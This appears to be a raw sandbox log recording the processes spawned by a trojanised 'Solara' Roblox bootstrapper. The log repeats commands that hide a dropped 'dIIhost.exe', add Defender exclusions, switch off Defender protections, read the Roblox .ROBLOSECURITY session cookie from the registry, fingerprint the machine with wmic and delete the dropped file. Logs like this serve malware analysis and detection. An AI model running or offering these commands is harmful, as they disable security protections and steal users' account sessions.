"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dIIhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\WinRAR\jLO855Jnqn959BA8qy.bat" "
C:\WinRAR\UnZiper.exe
"C:\WinRAR\UnZiper.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe" && pause
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Windows\system32\PING.EXE
ping localhost
C:\Users\Admin\AppData\Local\Temp\dIIhost.exe
"C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\WinRAR\jpTA2wLftqPiPx135h9wafJ5T.vbe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dIIhost.exe"
